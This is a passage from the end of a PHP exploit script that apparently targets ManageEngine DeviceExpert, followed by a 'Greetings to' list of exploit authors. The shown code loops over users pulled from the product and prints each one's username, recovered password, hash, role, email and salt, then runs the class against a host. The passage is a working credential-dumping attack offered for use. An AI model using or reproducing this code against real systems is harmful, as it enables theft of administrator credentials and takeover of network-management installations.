'email' => $email[1],            'salt' => $salt[1]        ];    }    public function run() {        $users = $this->getUsers();        if (!$users) return;        foreach ($users as $user) {            $user_data = $this->parseUserData($user);            if (!$user_data) continue;            echo "User: " . $user_data['username'] . "\n";            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";            echo "Hash: " . $user_data['hash'] . "\n";            echo "Role: " . $user_data['role'] . "\n";            echo "Email: " . $user_data['email'] . "\n";            echo "Salt: " . $user_data['salt'] . "\n";            echo "----------------------------\n";        }    }}// استخدام الكلاس$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');$deviceExpert->run();?>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#google